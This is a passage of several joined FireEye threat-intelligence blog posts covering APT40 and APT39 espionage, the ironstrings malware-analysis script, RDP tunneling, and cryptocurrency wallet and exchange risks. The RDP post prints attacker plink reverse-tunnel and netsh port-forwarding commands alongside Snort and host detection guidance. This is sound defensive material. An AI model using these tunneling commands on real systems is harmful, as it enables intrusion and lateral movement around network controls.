Completing missions typically involves gathering and transferring information out of the target network, which may involve moving files through multiple systems before reaching the destination. APT40 has been observed consolidating files acquired from victim networks and using the archival tool rar.exe to compress and encrypt the data before exfiltration. We have also observed APT40 develop tools such as PAPERPUSH to aid in the effectiveness of their data targeting and theft.

Outlook and Implications

Despite increased public attention, APT40 continues to conduct cyber espionage operations following a regular tempo, and we anticipate their operations will continue through at least the near and medium term. Based on APT40’s broadening into election-related targets in 2017, we assess with moderate confidence that the group’s future targeting will affect additional sectors beyond maritime, driven by events such as China’s Belt and Road Initiative. In particular, as individual Belt and Road projects unfold, we are likely to see continued activity by APT40 which extends against the project’s regional opponents.

FLARE Script Series: Recovering Stackstrings Using Emulation with ironstrings

This blog post continues our Script Series where the FireEye Labs Advanced Reverse Engineering (FLARE) team shares tools to aid the malware analysis community. Today, we release ironstrings: a new IDAPython script to recover stackstrings from malware. The script leverages code emulation to overcome this common string obfuscation technique. More precisely, it makes use of our flare-emu tool, which combines IDA Pro and the Unicorn emulation engine. In this blog post, I explain how our new script uses flare-emu to recover stackstrings from malware. In addition, I discuss flare-emu’s event hooks and how you can use them to easily adapt the tool to your own analysis needs.

Introduction

Analyzing strings in binary files is an important part of malware analysis. Although simple, this reverse engineering technique can provide valuable information about a program’s use and its capabilities. This includes indicators of compromise like file paths and domain names. Especially during advanced analysis, strings are essential to understand a disassembled program’s functionality. Malware authors know this, and string obfuscation is one of the most common anti-analysis techniques reverse engineers encounter.

Due to the prevalence of obfuscated strings, the FLARE team has already developed and shared various tools and techniques to deal with them. In 2014 we published an IDA Pro plugin to automate the recovery of constructed strings in malware. In 2016, we released FLOSS; a standalone open-source tool to automatically identify and decode strings in malware.

Both solutions rely on vivisect, a Python-based program analysis and emulation framework. Although vivisect is a robust tool, it may fail to completely analyze an executable file or emulate its code correctly. And just like any tool, vivisect is susceptible to anti-analysis techniques. With missing, incomplete, or erroneous processing by vivisect, dependent tools cannot provide the best results. Moreover, vivisect does not provide an easy-to-use graphical interface to interactively change and enhance program analysis.

I encountered all these shortcomings recently, when I analyzed a GandCrab ransomware sample (version 5.0.4, SHA256 hash: 72CB1061A10353051DA6241343A7479F73CB81044019EC9A9DB72C41D3B3A2C7). The malware contains various anti-analysis techniques to hinder disassembly and control-flow analysis. Before I could perform any efficient reverse engineering in IDA Pro, I had to overcome these hurdles. I used IDAPython to remove various anti-analysis instruction patterns which then allowed the disassembler to successfully identify all functions in the binary. Many of the recovered functions contained obfuscated strings. Unfortunately, my changes did not propagate to vivisect, because it performs its own independent analysis on the original binary. Consequently, vivisect still failed to recognize most functions correctly and I couldn’t use one of our existing solutions to recover the obfuscated strings.

While I could have tried to feed my patches in IDA Pro back to vivisect or to create a modified binary, I instead created a new IDAPython script that does not depend on vivisect. Thus, circumventing the mentioned shortcomings. It uses IDA Pro’s program analysis and Unicorn’s emulation engine. The easy integration of these two tools is powered by flare-emu.

Using IDA Pro instead of vivisect resolves multiple limitations of our previous implementations. Now changes that users make in their IDB file, e.g. by patching instructions to manually enhance analysis, are immediately available during emulation. Moreover, the tool more robustly supports different architectures including x86, AMD64, and ARM.

Stackstrings: An Example

The disassembly listing in Figure 1 shows an example string obfuscation from the sample I analyzed. The malware creates a string at run-time by moving each character into adjacent stack addresses (gray highlights). Finally, the sample passes the string’s starting offset as an argument to the InternetOpen API call (blue highlight). Manually following these memory moves and restoring strings by hand is a very cumbersome process. Especially if malware complicates value assignments using additional instructions like illustrated below.


Figure 1: Disassembly listing showing stackstring creation and usage

Because malware often uses stack memory to create such strings, Jay Smith coined the term stackstrings for this anti-analysis technique. Note that malware can also construct strings in global memory. Our new script handles both cases; strings constructed on the stack and in global memory.

ironstrings: Stackstring Recovery Using flare-emu

The new IDAPython script is an evolution of our existing solutions. It combines FLOSS’s stackstring recovery algorithm and functionality from our IDA Pro plugin. The script relies on IDA Pro’s program analysis and emulates code using Unicorn. The combination of both tools is powered by flare-emuFe, short for flare-emu, is the chemical symbol for iron and hence the script is named ironstrings.

To recover stackstrings, ironstrings enumerates all disassembled functions in a program except for library and thunk functions as identified by IDA Pro. For each function, the script emulates various code paths through the function and searches for stackstrings based on two heuristics:

  1. Before all call instructions in the function. As stackstrings are often constructed and then passed to other functions, i.e. Windows APIs like CreateFile or InternetOpenUrl.
  2. At the end of a basic block containing more than five memory writes. The number of memory writes is configurable. This heuristic is helpful if the same memory buffer is used multiple times in a function and if the string construction spans multiple basic blocks.

If any of these conditions apply, the script searches the function’s current stack frame for printable ASCII and UTF-16 strings. To detect strings in global memory, the script additionally searches for strings in all memory locations that have been written to.

Using flare-emu Hooks to Recover Stackstrings

If you’re not already familiar with flare-emu, I recommend reading our previous blog post. It discusses some of the interfaces the tool provides. Other helpful resources are the examples and the project documentation available on the flare-emu GitHub.

The stackstrings script uses flare-emu’s iterateAllPaths API. The function iterates multiple code paths through a function. It first finds possible paths from function start to function end. The tool then forces the emulation down all identified code paths independent from the actual program state. This extensive code coverage allows ironstrings to recover strings constructed from many different emulation runs.

A key feature of flare-emu are the various hook functions that get triggered by different emulation events. These hooks, or callbacks, enable the development of very powerful automation tasks. The available hooks are a combination of Unicorn’s standard hooks, e.g., to hook memory access events, and multiple convenience hooks provided by flare-emu. The following section briefly describes the available callbacks in flare-emu and illustrates how the ironstrings script uses them to recover obfuscated strings.

  • instructionHook: This Unicorn standard hook is triggered before an instruction is emulated. ironstrings uses this hook to initiate the stackstrings extraction if a basic block contained enough memory writes, for example.
  • memAccessHook: This Unicorn standard hook is triggered when memory read or write events occur during emulation. In the stackstrings script this function stores data about all memory writes.
  • callHook: This flare-emu hook is activated before each function call. The hook’s return value is ignored. In the stackstrings script this hook triggers the extraction of stackstrings.
  • preEmuCallback: This flare-emu hook is called before each emulation run. It is only available in the iterate and the iterateAllPaths functions. The hook’s return value is ignored. ironstrings does not use this hook.
  • targetCallback: This flare-emu hook gets called whenever one of the specified target addresses is hit. It is only available in the iterate and the iterateAllPaths functions. The hook’s return value is ignored. The stackstrings script does not use this hook.

The code in Figure 2 shows the callback functions that flare-emu’s API currently supports, their signatures, and examples of how to use them. All callbacks receive an argument named hookData. This named dictionary allows the user to provide application specific data to use before, during, and after emulation. Often, this dictionary is named userData in the user-defined callbacks, as in the examples below, due to its naming in Unicorn. ironstrings uses this to access function analysis data and store recovered strings across its various hooks. The dictionary also provides access to the EmuHelper object and emulation meta data.


Figure 2: flare-emu example hook implementations

Installation

Download and install flare-emu as described at the GitHub installation pageironstrings is available, along with our other IDA Pro plugins and scripts, at our ironstrings GitHub page.

Note that both flare-emu and ironstrings were written using the new IDAPython API available in IDA Pro 7.0 and higher. They are not backwards compatible with previous program versions.

Usage and Options

To run the script in IDA Pro, go to File – Script File... (ALT+F7) and select ironstrings.py. The script runs automatically on all functions, prints its results to IDA Pro's output window, and adds comments at the locations where it recovered stackstrings. Figure 3 shows the script’s output of the recovered stackstring locations from the GandCrab sample. Analysis of this malware takes the script about 15 seconds.


Figure 3: Deobfuscated stackstrings and locations where they were identified

Figure 4 shows the disassembly listing of the stackstring creation example discussed at the beginning of this post after running ironstrings.


Figure 4: Commented stackstring after running ironstrings

After analyzing a sample, the script provides a summary and a unique listing of all recovered strings. The output for the ransomware sample is shown in Figure 5. Here the tool failed to analyze two functions due to invalid memory operations during Unicorn’s code emulation.


Figure 5: Script summary and unique string listing

Note that you can modify various options to change the script’s behavior. For example, you can configure the output format at the top of the ironstrings.py file. The script’s README file explains the options in more detail.

Conclusion

This blog post explains how our new IDAPython script ironstrings works and how you can use it to automatically recover stackstrings in IDA Pro. Overcoming anti-analysis techniques is just one of many useful applications of code emulation for malware analysis. This post shows that flare-emu provides the ideal base for this by integrating IDA Pro and Unicorn. The detailed discussion of flare-emu’s hook functions will help you to write your own powerful automation scripts. Please reach out to us with questions, suggestions and feedback via the flare-emu and flare-ida GitHub issue trackers.

APT39: An Iranian Cyber Espionage Group Focused on Personal Information

UPDATE (Jan. 30): Figure 1 has been updated to more accurately reflect APT39 targeting. Specifically, Australia, Norway and South Korea have been removed.

In December 2018, FireEye identified APT39 as an Iranian cyber espionage group responsible for widespread theft of personal information. We have tracked activity linked to this group since November 2014 in order to protect organizations from APT39 activity to date. APT39’s focus on the widespread theft of personal information sets it apart from other Iranian groups FireEye tracks, which have been linked to influence operations, disruptive attacks, and other threats. APT39 likely focuses on personal information to support monitoring, tracking, or surveillance operations that serve Iran’s national priorities, or potentially to create additional accesses and vectors to facilitate future campaigns. 

APT39 was created to bring together previous activities and methods used by this actor, and its activities largely align with a group publicly referred to as "Chafer." However, there are differences in what has been publicly reported due to the variances in how organizations track activity. APT39 primarily leverages the SEAWEED and CACHEMONEY backdoors along with a specific variant of the POWBAT backdoor. While APT39's targeting scope is global, its activities are concentrated in the Middle East. APT39 has prioritized the telecommunications sector, with additional targeting of the travel industry and IT firms that support it and the high-tech industry. The countries and industries targeted by APT39 are depicted in Figure 1.


Figure 1: Countries and industries targeted by APT39

Operational Intent

APT39's focus on the telecommunications and travel industries suggests intent to perform monitoring, tracking, or surveillance operations against specific individuals, collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities, or create additional accesses and vectors to facilitate future campaigns. Government entities targeting suggests a potential secondary intent to collect geopolitical data that may benefit nation-state decision making. Targeting data supports the belief that APT39's key mission is to track or monitor targets of interest, collect personal information, including travel itineraries, and gather customer data from telecommunications firms.

Iran Nexus Indicators

We have moderate confidence APT39 operations are conducted in support of Iranian national interests based on regional targeting patterns focused in the Middle East, infrastructure, timing, and similarities to APT34, a group that loosely aligns with activity publicly reported as “OilRig”. While APT39 and APT34 share some similarities, including malware distribution methods, POWBAT backdoor use, infrastructure nomenclature, and targeting overlaps, we consider APT39 to be distinct from APT34 given its use of a different POWBAT variant. It is possible that these groups work together or share resources at some level.

Attack Lifecycle

APT39 uses a variety of custom and publicly available malware and tools at all stages of the attack lifecycle.

Initial Compromise

For initial compromise, FireEye Intelligence has observed APT39 leverage spear phishing emails with malicious attachments and/or hyperlinks typically resulting in a POWBAT infection. APT39 frequently registers and leverages domains that masquerade as legitimate web services and organizations that are relevant to the intended target. Furthermore, this group has routinely identified and exploited vulnerable web servers of targeted organizations to install web shells, such as ANTAK and ASPXSPY, and used stolen legitimate credentials to compromise externally facing Outlook Web Access (OWA) resources.

Establish Foothold, Escalate Privileges, and Internal Reconnaissance

Post-compromise, APT39 leverages custom backdoors such as SEAWEED, CACHEMONEY, and a unique variant of POWBAT to establish a foothold in a target environment. During privilege escalation, freely available tools such as Mimikatz and Ncrack have been observed, in addition to legitimate tools such as Windows Credential Editor and ProcDump. Internal reconnaissance has been performed using custom scripts and both freely available and custom tools such as the port scanner, BLUETORCH.

Lateral Movement, Maintain Presence, and Complete Mission

APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol (RDP), Secure Shell (SSH), PsExec, RemCom, and xCmdSvc. Custom tools such as REDTRIP, PINKTRIP, and BLUETRIP have also been used to create SOCKS5 proxies between infected hosts. In addition to using RDP for lateral movement, APT39 has used this protocol to maintain persistence in a victim environment. To complete its mission, APT39 typically archives stolen data with compression tools such as WinRAR or 7-Zip.


Figure 2: APT39 attack lifecycle

There are some indications that APT39 demonstrated a penchant for operational security to bypass detection efforts by network defenders, including the use of a modified version of Mimikatz that was repacked to thwart anti-virus detection in one case, as well as another instance when after gaining initial access APT39 performed credential harvesting outside of a compromised entity's environment to avoid detection.

Outlook

We believe APT39's significant targeting of the telecommunications and travel industries reflects efforts to collect personal information on targets of interest and customer data for the purposes of surveillance to facilitate future operations. Telecommunications firms are attractive targets given that they store large amounts of personal and customer information, provide access to critical infrastructure used for communications, and enable access to a wide range of potential targets across multiple verticals. APT39's targeting not only represents a threat to known targeted industries, but it extends to these organizations' clientele, which includes a wide variety of sectors and individuals on a global scale. APT39's activity showcases Iran's potential global operational reach and how it uses cyber operations as a low-cost and effective tool to facilitate the collection of key data on perceived national security threats and gain advantages against regional and global rivals.

Bypassing Network Restrictions Through RDP Tunneling

Remote Desktop Services is a component of Microsoft Windows that is used by various companies for the convenience it offers systems administrators, engineers and remote employees. On the other hand, Remote Desktop Services, and specifically the Remote Desktop Protocol (RDP), offers this same convenience to remote threat actors during targeted system compromises. When sophisticated threat actors establish a foothold and acquire ample logon credentials, they may switch from backdoors to using direct RDP sessions for remote access. When malware is removed from the equation, intrusions become increasingly difficult to detect.

RDPing Against the Rules

Threat actors continue to prefer RDP for the stability and functionality advantages over non-graphical backdoors, which can leave unwanted artifacts on a system. As a result, FireEye has observed threat actors using native Windows RDP utilities to connect laterally across systems in compromised environments. Historically, non-exposed systems protected by a firewall and NAT rules were generally considered not to be vulnerable to inbound RDP attempts; however, threat actors have increasingly started to subvert these enterprise controls with the use of network tunneling and host-based port forwarding.

Network tunneling and port forwarding take advantage of firewall "pinholes" (ports not protected by the firewall that allow an application access to a service on a host in the network protected by the firewall) to establish a connection with a remote server blocked by a firewall. Once a connection has been established to the remote server through the firewall, the connection can be used as a transport mechanism to send or "tunnel" local listening services (located inside the firewall) through the firewall, making them accessible to the remote server (located outside the firewall), as shown in Figure 1.


Figure 1: Enterprise firewall bypass using RDP and network tunneling with SSH as an example

Inbound RDP Tunneling

A common utility used to tunnel RDP sessions is PuTTY Link, commonly known as Plink. Plink can be used to establish secure shell (SSH) network connections to other systems using arbitrary source and destination ports. Since many IT environments either do not perform protocol inspection or do not block SSH communications outbound from their network, attackers such as FIN8 have used Plink to create encrypted tunnels that allow RDP ports on infected systems to communicate back to the attacker command and control (C2) server.

Example Plink Executable Command:

plink.exe <users>@<IP or domain> -pw <password> -P 22 -2 -4 -T -N -C -R 12345:127.0.0.1:3389

Figure 2 provides an example of a successful RDP tunnel created using Plink, and Figure 3 provides an example of communications being sent through the tunnel using port forwarding from the attacker C2 server.


Figure 2: Example of successful RDP tunnel created using Plink


Figure 3: Example of successful port forwarding from the attacker C2 server to the victim

It should be noted that for an attacker to be able to RDP to a system, they must already have access to the system through other means of compromise in order to create or access the necessary tunneling utility. For example, an attacker’s initial system compromise could have been the result of a payload dropped from a phishing email aimed at establishing a foothold into the environment, while simultaneously extracting credentials to escalate privileges. RDP tunneling into a compromised environment is one of many access methods typically used by attackers to maintain their presence in an environment.

Jump Box Pivoting

Not only is RDP the perfect tool for accessing compromised systems externally, RDP sessions can be daisy chained across multiple systems as a way to move laterally through an environment. FireEye has observed threat actors using the native Windows Network Shell (netsh) command to utilize RDP port forwarding as a way to access newly discovered segmented networks reachable only through an administrative jump box.

Example netsh Port Forwarding Command:

netsh interface portproxy add v4tov4 listenport=8001 listenaddress=<JUMP BOX IP> connectport=3389 connectaddress=<DESTINATION IP>

Example Shortened netsh Port Forwarding Command:

netsh I p a v l=8001 listena=<JUMP BOX IP> connectp=3389 c=<DESTINATION IP>

For example, a threat actor could configure the jump box to listen on an arbitrary port for traffic being sent from a previously compromised system. The traffic would then be forwarded directly through the jump box to any system on the segmented network using any designated port, including the default RDP port TCP 3389. This type of RDP port forwarding gives threat actors a way to utilize a jump box’s allowed network routes without disrupting legitimate administrators who are using the jump box during an ongoing RDP session. Figure 4 provides an example of RDP lateral movement to a segmented network via an administrative jump box.


Figure 4: Lateral Movement via RDP using a jump box to a segmented network

Prevention and Detection of RDP Tunneling

If RDP is enabled, threat actors have a way to move laterally and maintain presence in the environment through tunneling or port forwarding. To mitigate vulnerability to and detect these types of RDP attacks, organizations should focus on both host-based and network-based prevention and detection mechanisms. For additional information see the FireEye blog post on establishing a baseline for remote desktop protocol.

Host-Based Prevention:

  • Remote Desktop Service: Disable the remote desktop service on all end-user workstations and systems for which the service is not required for remote connectivity.
  • Host-based Firewalls: Enable host-based firewall rules that explicitly deny inbound RDP connections.
  • Local Accounts: Prevent the use of RDP using local accounts on workstations by enabling the “Deny log on through Remote Desktop Services” security setting.

Host-Based Detection:

Registry Keys:

  • Review registry keys associated with Plink connections that can be abused by RDP session tunneling to identify unique source and destination systems. By default, both PuTTY and Plink store session information and previously connected ssh servers in the following registry keys on Windows systems:
    • HKEY_CURRENT_USER\Software\SimonTatham\PuTTY
    • HKEY_CURRENT_USER\SoftWare\SimonTatham\PuTTY\SshHostKeys
  • Similarly, the creation of a PortProxy configuration with netsh is stored with the following Windows registry key:
    • HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4
  • Collecting and reviewing these registry keys can identify both legitimate SSH and unexpected tunneling activity. Additional review may be needed to confirm the purpose of each artifact.

Event Logs:

  • Review event logs for high-fidelity logon events. Common RDP logon events are contained in the following event logs on Windows systems:
    • %systemroot%\Windows\System32\winevt\Logs\Microsoft-TerminalServices-LocalSessionmanager%3Operational.evtx
    • %systemroot%\Windows\System32\winevt\Logs\Security.evtx
  • The “TerminalServices-LocalSessionManager” log contains successful interactive local or remote logon events as identified by EID 21 and successful reconnection of a previously established RDP session not terminated by a proper user logout as identified by EID 25. The “Security” log contains successful Type 10 remote interactive logons (RDP) as identified by EID 4624. A source IP address recorded as a localhost IP address (127.0.0.1 – 127.255.255.255) may be indicative of a tunneled logon routed from a listening localhost port to the localhost’s RDP port TCP 3389.

Review your artifacts of execution for “plink.exe” file execution. Note that attackers can rename the file name to avoid detection. Relevant artifacts include, but are not limited to:

  • Application Compatibility Cache/Shimcache
  • Amcache
  • Jump Lists
  • Prefetch
  • Service Events
  • CCM Recently Used Apps from the WMI repository
  • Registry keys

Network-Based Prevention:

  • Remote Connectivity: Where RDP is required for connectivity, enforce the connection to be initiated from a designated jump box or centralized management server.
  • Domain Accounts: Employ the “Deny log on through Remote Desktop Services” security setting for privileged accounts (e.g. domain administrators) and service accounts, as these types of accounts are commonly used by threat actors to laterally move to sensitive systems in an environment.

Network-Based Detection:

  • Firewall Rules: Review existing firewall rules to identify areas of vulnerability to port forwarding. In addition to the potential use of port forwarding, monitoring for internal communications between workstations in the environment should be conducted. Generally, workstations do not have a need to communicate with one another directly and Firewall rules can be used to prevent any such communication, except where needed.
  • Network Traffic: Perform content inspection of network traffic. Not all traffic communicating on a given port is what it appears to be. For example, threat actors may use TCP ports 80 or 443 to establish an RDP tunnel with a remote server. Deep inspection of the network traffic can likely reveal that it is not actually HTTP or HTTPS, but entirely different traffic all together. Therefore, organizations should closely monitor their network traffic.
  • Snort Rules: The main indicator of tunneled RDP occurs when the RDP handshake has a designated low source port generally used for another protocol. Figure 5 provides two sample Snort rules that can help security teams identify RDP tunneling in their network traffic by identifying designated low source ports generally used for other protocols.

alert tcp any [21,22,23,25,53,80,443,8080] -> any !3389 (msg:"RDP - HANDSHAKE [Tunneled msts]"; dsize:<65; content:"|03 00 00|"; depth:3; content:"|e0|"; distance:2; within:1; content:"Cookie: mstshash="; distance:5; within:17; sid:1; rev:1;)

alert tcp any [21,22,23,25,53,80,443,8080] -> any !3389 (msg:"RDP - HANDSHAKE [Tunneled]"; flow:established; content:"|c0 00|Duca"; depth:250; content:"rdpdr"; content:"cliprdr"; sid:2; rev:1;)

Figure 5: Sample Snort Rules to identify RDP tunneling

Conclusion

RDP enables IT environments to offer freedom and interoperability to users. But with more and more threat actors using RDP to move laterally across networks with limited segmentation, security teams are being challenged to decipher between legitimate and malicious RDP traffic. Therefore, adequate host-based and network-based prevention and detection methods should be taken to actively monitor for and be able to identify malicious RDP usage.

Cryptocurrency and Blockchain Networks: Facing New Security Paradigms

On Jan. 22, FireEye participated in a panel focused on cryptocurrencies and blockchain technology during the World Economic Forum. The panel addressed issues raised in a report developed by FireEye, together with our partner Marsh & McLennan (a global professional services firm) and Circle (a global crypto finance company). The report touched on some of the security considerations around crypto-assets – today and in the future, and in this blog post, we delve deeper into the security paradigms surrounding cryptocurrencies and blockchain networks.

First, some background that will provide context for this discussion.

Cryptocurrencies – A Primer

By its simplest definition, cryptocurrency is digital money that operates on its own decentralized transaction network. When defined holistically, many argue that cryptocurrencies and their distributed ledger (blockchain) technology is powerful enough to radically change the basic economic pillars of society and fundamentally alter the way our systems of trust, governance, trade, ownership, and business function. However, the technology is new, subject to change, and certain headwinds related to scalability and security still need to be navigated. It is safe to assume that the ecosystem we have today will evolve. Since the final ecosystem is yet to be determined, as new technology develops and grows in user adoption, the associated risk areas will continually shift – creating new cyber security paradigms for all network users to consider, whether you are an individual user of cryptocurrency, a miner, a service-provider (e.g., exchange, trading platform, or key custodian), a regulator, or a nation-state with vested political interest.

Malicious actors employ a wide variety of tactics to steal cryptocurrencies. These efforts can target users and their wallets, exchanges and/or key custodial services, and underlying networks or protocols supporting cryptocurrencies. FireEye has observed successful attacks that steal from users and cryptocurrency exchanges over the past several years. And while less frequent, attacks targeting cryptocurrency networks and protocols have also been observed. We believe cryptocurrency exchanges and/or key custodial services are, and will continue to be, attractive targets for malicious operations due to the potentially large profits, their often-lax physical and network security, and the lack of regulation and oversight.

This blog post will highlight some of the various risk areas to consider when developing and adopting cryptocurrency and blockchain technology.

Wallet & Key Management

Public and Private Keys

There are two types of keys associated with each wallet: a public key and a private key. Each of these keys provides a different function, and it is the security of the private key that is paramount to securing cryptocurrency funds.

The private key is a randomly generated number used to sign transactions and spend funds within a specific wallet, and the public key (which is derived from the private key) is used to generate a wallet address to which they can receive funds.


Figure 1: Private key, public key, and address generation flow

The private key must be kept secret at all times and, unfortunately, revealing it to third-parties (or allowing third-parties to manage and store private keys) increases convenience at the expense of security. In fact, some of the most high-profile exchange breaches have occurred in large part due to a lack of operational controls relating to the storage of private keys. Maintaining the confidentiality, integrity, and availability of private keys requires fairly robust controls.

However, from an individual user perspective, a large number of user-controlled software wallet solutions store the private and public keys in a wallet file on the user’s hard drive that is located in a well-known directory, making it an ideal target for actors that aim to steal private keys. Easily available tools such as commercial keyloggers and remote access tools (RATs) can be used to steal funds by stealing (or making copies of) a user’s wallet file. FireEye has observed myriad malware families, traditionally aimed at stealing banking credentials, incorporate the ability to target cryptocurrency wallets and online services. FireEye Intelligence subscribers may be familiar with this already, as we’ve published about these malware families use in targeting cryptocurrency assets on our FireEye Intelligence Portal. The following are some of the more prominent crimeware families we have observed include such functionality:

  • Atmos
  • Dridex
  • Gozi/Ursnif
  • Ramnit
  • Terdot
  • Trickbot
  • ZeusPanda/PandaBot
  • IcedID
  • SmokeLoader
  • Neptune EK
  • BlackRuby Ransomware
  • Andromeda/Gamarue
  • ImminentMonitor RAT
  • jRAT
  • Neutrino
  • Corebot

Wallet Solutions

By definition, cryptocurrency wallets are used to store a user’s keys, which can be used to unlock access to the funds residing in the associated blockchain entry (address). Several types of wallets exist, each with their own level of security (pros) and associated risks (cons). Generally, wallets fall into two categories: hot (online) and cold (offline).

Hot Wallets

A wallet stored on a general computing device connected to the internet is often referred to as a “hot” wallet. This type of storage presents the largest attack surface and is, consequently, the riskiest way to store private keys. Types of hot wallets typically include user-controlled and locally stored wallets (also referred to as desktop wallets), mobile wallets, and web wallets. If remote access on any hot wallet device occurs, the risk of theft greatly increases. As stated, many of these solutions store private keys in a well-known and/or unencrypted location, which can make for an attractive target for bad actors. While many of these wallet types offer the user high levels of convenience, security is often the trade-off.

Wallet Type

Examples

Desktop

  • Bitcoin Core
  • Atomic
  • Exodus
  • Electrum
  • Jaxx

Mobile

  • BRD
  • Infinito
  • Jaxx
  • Airbitz
  • Copay
  • Freewallet

Web

  • MyEtherWallet
  • MetaMask
  • Coinbase
  • BTC Wallet
  • Blockchain.info

Table 1: Types of hot wallets

If considering the use of hot wallet solutions, FireEye recommends some of the following ways to help mitigate risk:

  • Use two-factor authentication when available (as well as fingerprint authentication where applicable).
  • Use strong passwords.
  • Ensure that your private keys are stored encrypted (if possible).
  • Consider using an alternative or secondary device to access funds (like a secondary mobile device or computer not generally used every day) and kept offline when not in use.
Cold Wallets

Offline, also called cold wallets, are those that generate and store private keys offline on an air-gapped computer without network interfaces or connections to the outside internet. Cold wallets work by taking the unsigned transactions that occur online, transferring those transactions offline to be verified and signed, and then pushing the transactions back online to be broadcasted onto the Bitcoin network. Managing private keys in this way is considered to be more secure against threats such as hackers and malware. These types of offline vaults used for storing private keys is becoming the industry security standard for key custodians such as Coinbase, Bittrex, and other centralized cryptocurrency companies. Even recently, Fidelity Investments released a statement regarding their intentions to play an integral part of the Bitcoin’s custodial infrastructure landscape.

"Fidelity Digital Assets will provide a secure, compliant, and institutional-grade omnibus storage solution for bitcoin, ether and other digital assets. This consists of vaulted cold storage, multi-level physical and cyber controls – security protocols that have been created leveraging Fidelity’s time-tested security principles and best practices combined with internal and external digital asset experts."

-Fidelity Investments                                

While more security-conscious exchanges employ this type of key storage for their users, cold wallets are still susceptible to exploitation:

  • In November 2017, ZDnet published an article describing four methods hackers use to steal data from air-gapped computers through what they call “covert channels.” These channels can be broken down into four groups:
    • Electromagnetic
    • Acoustic
    • Thermal
    • Optical
  • In addition to those four types of attacks, WikiLeaks revealed, as part of its ongoing Vault 7 leak, a tool suite (dubbed Brutal Kangaroo, formerly EZCheese) allegedly used by the CIA for targeting air-gapped networks.
  • In February 2018, security researchers with the Cybersecurity Research Center at Israel's Ben-Gurion University made use of a proof-of-concept (PoC) malware that allowed for the exfiltration of data from computers placed inside a Faraday cage (an enclosure used to block electromagnetic fields). According to their research, attackers can exfiltrate data from any infected computer, regardless if air-gapped or inside a Faraday cage. The same group of researchers also revealed additional ways to exploit air-gapped computers:
    • aIR-Jumper attack that steals sensitive information from air-gapped computers with the help of infrared-equipped CCTV cameras that are used for night vision
    • USBee attack that can be used steal data from air-gapped computers using radio frequency transmissions from USB connectors
    • DiskFiltration attack that can steal data using sound signals emitted from the hard disk drive (HDD) of the targeted air-gapped computer
    • BitWhisper that relies on heat exchange between two computer systems to stealthily siphon passwords or security keys
    • AirHopper that turns a computer's video card into an FM transmitter to capture keystrokes
    • Fansmitter technique that uses noise emitted by a computer fan to transmit data
    • GSMem attack that relies on cellular frequencies
    • PowerHammer, a malware that leverages power lines to exfiltrate data from air-gapped computers.
Hardware Wallets

Hardware wallets are typically a small peripheral device (such as USB drives) used to generate and store keys, as well as verify and sign transactions. The device signs the transactions internally and only transmits the signed transactions to the network when connected to a networked computer. It is this separation of the private keys from the vulnerable online environment that allows a user to transact on the blockchain with reduced risk.

However, hardware wallets are susceptible to exploitation as well, such as man-in-the-middle (MitM) supply chain attacks, wherein a compromised device is purchased. Such an event obstenibly occurred in early 2018, when an individual purchased a compromised Nano Ledger off of eBay, and consequently lost $34,000 USD worth of cryptocurrency stored on the device as the attacker created their own recovery seed to later retrieve the funds stored on the device. In order to trick the victim, the attacker included a fake recovery seed form inside the compromised device packaging (as seen in Figure 2).


Figure 2: Fraudulent recovery seed document for Ledger Nano (image source: Reddit)

To help mitigate the risk of such an attack, FireEye recommends only purchasing a hardware wallet from the manufacturer directly or through authorized resellers.

In addition to supply-chain attacks, security researchers with Wallet.fail have recently disclosed two vulnerabilities in the Ledger Nano S device. One of these vulnerabilities allows an attacker to execute arbitrary code from the boot menu, and the other allows physical manipulation without the user knowing due to a lack of tamper evidence. In both cases, physical access to the device is required, and thus deemed less likely to occur if proper physical security of the device is maintained and unauthorized third-party purchasing is avoided.

Paper Wallets

Typically, wallet software solutions hide the process of generating, using, and storing private keys from the user. However, a paper wallet involves using an open-source wallet generator like BitAddress[.]org and WalletGenerator[.]net to generate the user’s public and private keys. Those keys are then printed to a piece of paper. While many view this form of key management as more secure because the keys do not reside on a digital device, there are still risks.

Because the private key is printed on paper, theft, loss, and physical damage present the highest risk to the user. Paper wallets are one of the only forms of key management that outwardly display the private key in such a way and should be used with extreme caution. It is also known that many printers keep a cache of printed content, so the possibility of extracting printed keys from exploited printers should also be considered.

Exchanges & Key Custodians

According to recent Cambridge University research, in 2013 there were approximately 300,000 to 1.3 million users of cryptocurrency. By 2017 there were between 2.9 million and 5.8 million users. To facilitate this expedited user growth, a multitude of companies have materialized that offer services enabling user interaction with the various cryptocurrency networks. A majority of these businesses function as an exchange and/or key custodians. Consequently, this can make the organization an ideal candidate for intrusion activity, whether it be spear phishing, distributed denial of service (DDoS) attacks, ransomware, or extortion threats (from both internal and external sources).

Many cryptocurrency exchanges and services around the world have reportedly suffered breaches and thefts in recent years that resulted in substantial financial losses and, in many cases, closures (Figure 3). One 2013 study found that out of 40 bitcoin exchanges analyzed, over 22 percent had experienced security breaches, forcing 56 percent of affected exchanges to go out of business.


Figure 3: Timeline of publicly reported cryptocurrency service compromises

Some of the more notable cryptocurrency exchange attacks that have been observed are as follows:

Time Frame

Entity

Description

July 2018

Bancor

Bancor admitted that unidentified actors compromised a wallet that was used to upgrade smart contracts. The actors purportedly withdrew 24,984 ETH tokens ($12.5 million USD) and 229,356,645 NPXS (Pundi X) tokens (approximately $1 million USD). The hackers also stole 3,200,000 of Bancor's own BNT tokens (approximately $10 million USD). Bancor did not comment on the details of the compromise or security measures it planned to introduce.

June 2018

Bithumb

Attackers stole cryptocurrencies worth $30 million USD from South Korea's largest cryptocurrency exchange, Bithumb. According to Cointelegraph Japan, the attackers hijacked Bithumb's hot (online) wallet.

June 2018

Coinrail

Coinrail admitted there was a "cyber intrusion" in its system and an estimated 40 billion won ($37.2 million USD) worth of coins were stolen. Police are investigating the breach, but no further details were released.

February 2018

BitGrail

BitGrail claimed $195 million USD worth of customers' cryptocurrency in Nano (XRB) was stolen.

January 2018

Coincheck

Unidentified attackers stole 523 million NEM coins (approximately $534 million USD) from the exchange's hot wallet. Coincheck stated that NEM coins were kept on a single-signature hot wallet rather than a more secure multi-signature wallet and confirmed that stolen coins belonged to Coincheck customers.

July 2017

Coindash

